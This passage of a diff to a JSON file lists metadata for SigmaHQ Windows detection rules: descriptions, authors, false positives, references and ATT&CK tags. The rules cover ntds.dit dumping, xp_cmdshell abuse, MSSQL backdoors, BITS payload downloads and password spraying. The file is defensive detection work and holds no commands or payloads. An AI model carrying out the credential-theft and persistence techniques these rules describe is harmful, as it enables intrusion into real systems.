"falsepositive": [ - "Legitimate backup operation/creating shadow copies" - ], - "filename": "win_esent_ntdsutil_abuse.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mgreen27/status/1558223256704122882", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_esent_ntdsutil_abuse.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", - "value": "Ntdsutil Abuse" - }, - { - "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/14", - "falsepositive": [ - "Legitimate backup operation/creating shadow copies" - ], - "filename": "win_esent_ntdsutil_abuse_susp_location.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mgreen27/status/1558223256704122882", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_esent_ntdsutil_abuse_susp_location.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "94dc4390-6b7c-4784-8ffc-335334404650", - "value": "Dump Ntds.dit To Suspicious Location" - }, - { - "description": "Detects MSI package installation from suspicious locations", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/31", - "falsepositive": [ - "Some false positives may occur depending on the environnement" - ], - "filename": "win_msi_install_from_susp_locations.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_msi_install_from_susp_locations.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "c7c8aa1c-5aff-408e-828b-998e3620b341", - "value": "MSI Installation From Suspicious Locations" - }, - { - "description": "Detects installation of a remote msi file from web.", - "meta": { - "author": "Stamatis Chatzimangou", - "creation_date": "2022/10/23", - "falsepositive": [ - "Unknown" - ], - "filename": "win_msi_install_from_web.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/_st0pp3r_/status/1583922009842802689", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_msi_install_from_web.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218", - "attack.t1218.007" - ] - }, - "uuid": "5594e67a-7f92-4a04-b65d-1a42fd824a60", - "value": "MSI Installation From Web" - }, - { - "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/13", - "falsepositive": [ - "Rare legitimate administrative activity" - ], - "filename": "win_mssql_add_sysadmin_account.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_add_sysadmin_account.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "08200f85-2678-463e-9c32-88dce2f073d1", - "value": "MSSQL Add Account To Sysadmin Role" - }, - { - "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/13", - "falsepositive": [ - "This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up" - ], - "filename": "win_mssql_disable_audit_settings.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", - "https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16", - "https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_disable_audit_settings.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", - "value": "MSSQL Disable Audit Settings" - }, - { - "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", - "meta": { - "author": "Denis Szadkowski, DIRT / DCSO CyTec", - "creation_date": "2022/10/09", - "falsepositive": [ - "Legitimate extended stored procedures named maggie" - ], - "filename": "win_mssql_sp_maggie.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_sp_maggie.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546" - ] - }, - "uuid": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", - "value": "MSSQL Extended Stored Procedure Backdoor Maggie" - }, - { - "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/13", - "falsepositive": [ - "Legitimate use of the feature by administrators (rare)" - ], - "filename": "win_mssql_sp_procoption_set.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", - "https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_sp_procoption_set.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", - "value": "MSSQL SPProcoption Set" - }, - { - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/12", - "falsepositive": [ - "Unknown" - ], - "filename": "win_mssql_xp_cmdshell_audit_log.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_audit_log.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "7f103213-a04e-4d59-8261-213dddf22314", - "value": "MSSQL XPCmdshell Suspicious Execution" - }, - { - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/12", - "falsepositive": [ - "Legitimate enable/disable of the setting", - "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" - ], - "filename": "win_mssql_xp_cmdshell_change.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_change.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "d08dd86f-681e-4a00-a92c-1db218754417", - "value": "MSSQL XPCmdshell Option Change" - }, - { - "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/09/01", - "falsepositive": [ - "Legitimate Atera agent installation" - ], - "filename": "win_software_atera_rmm_agent_install.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_software_atera_rmm_agent_install.yml" - ], - "tags": [ - "attack.t1219" - ] - }, - "uuid": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", - "value": "Atera Agent Installation" - }, - { - "description": "Detects backup catalog deletions", - "meta": { - "author": "Florian Roth (rule), Tom U. @c_APT_ure (collection)", - "creation_date": "2017/05/12", - "falsepositive": [ - "Unknown" - ], - "filename": "win_susp_backup_delete.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx", - "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_susp_backup_delete.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ] - }, - "uuid": "9703792d-fd9a-456d-a672-ff92efe4806a", - "value": "Backup Catalog Deleted" - }, - { - "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/05/09", - "falsepositive": [ - "MsMpEng.exe can crash when C:\\ is full" - ], - "filename": "win_susp_msmpeng_crash.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5", - "https://technet.microsoft.com/en-us/library/security/4022344", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_susp_msmpeng_crash.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1211", - "attack.t1562.001" - ] - }, - "uuid": "6c82cf5c-090d-4d57-9188-533577631108", - "value": "Microsoft Malware Protection Engine Crash" - }, - { - "description": "Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688", - "meta": { - "author": "Florian Roth, wagga", - "creation_date": "2020/02/29", - "falsepositive": [ - "Unknown" - ], - "filename": "win_vul_cve_2020_0688.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/", - "https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_vul_cve_2020_0688.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "d6266bf5-935e-4661-b477-78772735a7cb", - "value": "CVE-2020-0688 Exploitation via Eventlog" - }, - { - "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/11/22", - "falsepositive": [ - "Other MSI packages for which your admins have used that name" - ], - "filename": "win_vul_cve_2021_41379.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/klinix5/InstallerFileTakeOver", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_vul_cve_2021_41379.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", - "value": "LPE InstallerFileTakeOver PoC CVE-2021-41379" - }, - { - "description": "Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.", - "meta": { - "author": "Pushkarev Dmitry", - "creation_date": "2020/06/28", - "falsepositive": [ - "Need tuning applocker or add exceptions in SIEM" - ], - "filename": "win_applocker_file_was_not_allowed_to_run.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/using-event-viewer-with-applocker", - "https://nxlog.co/documentation/nxlog-user-guide/applocker.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.006", - "attack.t1059.007" - ] - }, - "uuid": "401e5d00-b944-11ea-8f9a-00163ecd60ae", - "value": "File Was Not Allowed To Run" - }, - { - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/06/28", - "falsepositive": [ - "Unknown" - ], - "filename": "win_bits_client_susp_domain.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", - "https://twitter.com/malmoeb/status/1535142803075960832", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_domain.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ] - }, - "uuid": "d635249d-86b5-4dad-a8c7-d7272b788586", - "value": "Suspicious Download with BITS from Suspicious TLD" - }, - { - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "meta": { - "author": "frack113", - "creation_date": "2022/03/01", - "falsepositive": [ - "Administrator PowerShell scripts" - ], - "filename": "win_bits_client_susp_local_file.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_local_file.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ] - }, - "uuid": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", - "value": "Suspicious Download File Extension with BITS" - }, - { - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/06/28", - "falsepositive": [ - "Administrator PowerShell scripts" - ], - "filename": "win_bits_client_susp_local_folder.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_local_folder.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ] - }, - "uuid": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", - "value": "Download with BITS to Suspicious Folder" - }, - { - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "meta": { - "author": "frack113", - "creation_date": "2022/03/01", - "falsepositive": [ - "Administrator PowerShell scripts" - ], - "filename": "win_bits_client_susp_powershell_job.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_powershell_job.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ] - }, - "uuid": "fe3a2d49-f255-4d10-935c-bda7391108eb", - "value": "Suspicious Task Added by Powershell" - }, - { - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "meta": { - "author": "frack113", - "creation_date": "2022/03/01", - "falsepositive": [ - "Administrator PowerShell scripts" - ], - "filename": "win_bits_client_susp_use_bitsadmin.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_use_bitsadmin.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ] - }, - "uuid": "1ff315dc-2a3a-4b71-8dde-873818d25d39", - "value": "Suspicious Task Added by Bitsadmin" - }, - { - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/06/10", - "falsepositive": [ - "Other legitimate domains used by software updaters" - ], - "filename": "win_bits_client_uncommon_domain.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", - "https://twitter.com/malmoeb/status/1535142803075960832", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_uncommon_domain.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ] - }, - "uuid": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", - "value": "Suspicious Uncommon Download with BITS from Suspicious TLD" - }, - { - "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali", - "creation_date": "2022/01/20", - "falsepositive": [ - "Antivirus products" - ], - "filename": "win_codeintegrity_attempted_dll_load.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/SBousseaden/status/1483810148602814466", - "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "f8931561-97f5-4c46-907f-0a4a592e47a7", - "value": "Code Integrity Attempted DLL Load" - }, - { - "description": "Detects blocked load attempts of revoked drivers", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/11/10", - "falsepositive": [ - "Unknown" - ], - "filename": "win_codeintegrity_revoked_driver.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/wdormann/status/1590434950335320065", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ] - }, - "uuid": "9b72b82d-f1c5-4632-b589-187159bc6ec1", - "value": "Block Load Of Revoked Driver" - }, - { - "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/11/10", - "falsepositive": [ - "Unknown" - ], - "filename": "win_codeintergiry_blocked_driver_load.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/wdormann/status/1590434950335320065", - "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintergiry_blocked_driver_load.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ] - }, - "uuid": "e4be5675-4a53-426a-8c81-a8bb2387e947", - "value": "Code Integrity Blocked Driver Load" - }, - { - "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/14", - "falsepositive": [ - "Legitimate package hosted on a known and authorized remote location" - ], - "filename": "win_diagnosis_scripted_load_remote_diagcab.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/nas_bench/status/1539679555908141061", - "https://twitter.com/j00sean/status/1537750439701225472", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "50cb47b8-2c33-4b23-a2e9-4600657d9746", - "value": "Loading Diagcab Package From Remote Path" - }, - { - "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", - "meta": { - "author": "Tim Burrell", - "creation_date": "2020/02/07", - "falsepositive": [ - "Unknown" - ], - "filename": "win_apt_gallium.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_apt_gallium.yml" - ], - "tags": [ - "attack.credential_access", - "attack.command_and_control", - "attack.t1071" - ] - }, - "uuid": "3db10f25-2527-4b79-8d4b-471eb900ee29", - "value": "GALLIUM Artefacts - Builtin" - }, - { - "description": "This rule detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/05/08", - "falsepositive": [ - "Unknown" - ], - "filename": "win_susp_dns_config.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", - "https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx", - "https://twitter.com/gentilkiwi/status/861641945944391680", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_susp_dns_config.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "cbe51394-cd93-4473-b555-edf0144952d9", - "value": "DNS Server Error Failed Loading the ServerLevelPluginDLL" - }, - { - "description": "Detects plugged USB devices", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/11/09", - "falsepositive": [ - "Legitimate administrative activity" - ], - "filename": "win_usb_device_plugged.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/", - "https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1200" - ] - }, - "uuid": "1a4bd6e3-4c6e-405d-a9a3-53a116e341d4", - "value": "USB Device Plugged" - }, - { - "description": "A rule has been modified in the Windows Firewall exception list", - "meta": { - "author": "frack113", - "creation_date": "2022/02/19", - "falsepositive": "No established falsepositives", - "filename": "win_firewall_as_add_rule.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_add_rule.yml" - ], - "tags": "No established tags" - }, - "uuid": "cde0a575-7d3d-4a49-9817-b8004a7bf105", - "value": "Added Rule in Windows Firewall with Advanced Security" - }, { "description": "A rule has been modified in the Windows Firewall exception list", "meta": { @@ -14279,7 +3506,6991 @@ "value": "Setting Change in Windows Firewall with Advanced Security" }, { - "description": "Detects possible Active Directory enumeration via LDAP", + "description": "A rule has been modified in the Windows Firewall exception list", + "meta": { + "author": "frack113", + "creation_date": "2022/02/19", + "falsepositive": "No established falsepositives", + "filename": "win_firewall_as_add_rule.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_add_rule.yml" + ], + "tags": "No established tags" + }, + "uuid": "cde0a575-7d3d-4a49-9817-b8004a7bf105", + "value": "Added Rule in Windows Firewall with Advanced Security" + }, + { + "description": "Detects local user creation on windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your windows server logs and not on your DC logs.", + "meta": { + "author": "Patrick Bareiss", + "creation_date": "2019/04/18", + "falsepositive": [ + "Domain Controller Logs", + "Local accounts managed by privileged account management tools" + ], + "filename": "win_security_user_creation.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001" + ] + }, + "uuid": "66b6be3d-55d0-4f47-9855-d69df21740ea", + "value": "Local User Creation" + }, + { + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "7a922f1b-2635-4d6c-91ef-af228b198ad3", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security" + }, + { + "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", + "meta": { + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" + ] + }, + "uuid": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", + "value": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'" + }, + { + "description": "An attacker can use the SID history attribute to gain additional privileges.", + "meta": { + "author": "Thomas Patzke, @atc_project (improvements)", + "creation_date": "2017/02/19", + "falsepositive": [ + "Migration of an account into a new domain" + ], + "filename": "win_security_susp_add_sid_history.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=1772", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_sid_history.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1134.005" + ] + }, + "uuid": "2632954e-db1c-49cb-9936-67d1ef1d17d2", + "value": "Addition of SID History to Active Directory Object" + }, + { + "description": "Detects failed logins with multiple accounts from a single process on the system.", + "meta": { + "author": "Mauricio Velazco", + "creation_date": "2021/06/01", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_logons_single_process.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://www.trimarcsecurity.com/single-post/2018/05/06/trimarc-research-detecting-password-spraying-with-security-event-auditing", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_process.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "fe563ab6-ded4-4916-b49f-a3a8445fe280", + "value": "Multiple Users 